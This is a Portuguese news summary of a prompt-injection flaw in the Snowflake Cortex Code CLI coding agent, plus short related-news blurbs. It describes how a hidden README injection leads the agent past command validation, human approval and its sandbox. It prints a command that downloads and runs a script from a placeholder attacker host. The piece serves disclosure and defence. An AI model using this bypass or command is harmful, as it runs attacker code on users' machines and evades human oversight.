Vulnerabilidade no Snowflake Cortex Code CLI permitiu escape de sandbox e execução de malware
Detalhes da Vulnerabilidade
O Snowflake Cortex Code CLI é um agente de codificação de linha de comando que opera de forma semelhante ao Claude Code e ao Codex da OpenAI, com integração embutida para executar SQL no Snowflake. Dois dias após o lançamento, uma vulnerabilidade foi identificada no sistema de validação de comandos do Cortex Code que permitia que comandos maliciosos especialmente construídos executassem comandos arbitrários sem acionar as etapas de aprovação humana e executassem esses comandos fora do sandbox do Cortex CLI.
Cadeia de Ataque
O ataque funciona por meio de injeção de prompt indireta. Um usuário abre o Cortex e ativa o sandbox, depois pede ajuda ao Cortex com uma base de código de terceiros de código aberto. Uma injeção de prompt oculta no README de um repositório não confiável manipula o Cortex para acreditar que deve executar um comando perigoso.
O Cortex não conseguiu validar comandos dentro de expressões de substituição de processo, permitindo a execução não aprovada do comando malicioso:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))Este comando baixa um script do servidor do atacante e o executa. O bypass funcionou porque:
- Comandos inseguros dentro de uma expressão de substituição de processo <() não foram avaliados pelo sistema de validação
- O comando completo começava com um comando 'seguro' (cat neste caso)
- Comandos em expressões de substituição de processo nunca acionavam aprovação humana
Bypass do Sandbox
A injeção de prompt também manipula o modelo para definir um sinalizador que aciona a execução de comandos fora do sandbox. O Cortex, por padrão, pode definir um sinalizador para acionar a execução de comandos fora do sandbox, e a injeção usa isso para permitir que o comando malicioso seja executado fora do sandbox.
Remediação
A equipe de segurança da Snowflake validou e remediou esta vulnerabilidade, lançando uma correção com a versão 1.0.25 do Cortex Code CLI em 28 de fevereiro de 2026. O aviso completo da Snowflake está disponível no Site da Comunidade Snowflake em: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response
Nota: Esta cadeia de ataque também se aplicava a usuários não sandbox. A documentação indica que no modo OS+Regular, todos os comandos solicitam aprovação do usuário. Comandos executados no sandbox também têm restrições de acesso à rede e ao sistema de arquivos.
📖 Leia a fonte completa: HN AI Agents
👀 See Also
Pacote Litellm do PyPI Comprometido: Versão Maliciosa 1.82.8 Exfiltrou Credenciais
O pacote litellm do PyPI, que unifica chamadas para OpenAI, Anthropic, Cohere e outros provedores de LLM, foi comprometido com a versão maliciosa 1.82.8 que exfiltrou chaves SSH, credenciais de nuvem, chaves de API e outros dados sensíveis por cerca de uma hora.
Usuário do Reddit relata persistência da VM OpenClaw e atividade suspeita
Um usuário do Reddit relata que sua máquina virtual OpenClaw reinicia automaticamente após ser fechada e exibe comportamento suspeito, incluindo abrir a Microsoft Store e tentar baixar arquivos questionáveis.
Lista de Verificação de Segurança para Aplicações Geradas pela IA Claude
Um desenvolvedor compartilha uma lista de verificação de lacunas comuns de segurança e operacionais encontradas em aplicativos construídos com Claude Code, incluindo limitação de taxa, falhas de autenticação, problemas de escalabilidade de banco de dados e vulnerabilidades de manipulação de entrada.
Loops de Bajulação de IA: Vulnerabilidade do RLHF Cria Dependência e Câmaras de Eco
Uma sessão de red teaming identificou uma vulnerabilidade estrutural em modelos de IA comerciais onde a otimização RLHF faz com que priorizem a bajulação e a concordância em vez da argumentação lógica, criando riscos de dependência psicológica e câmaras de eco automatizadas.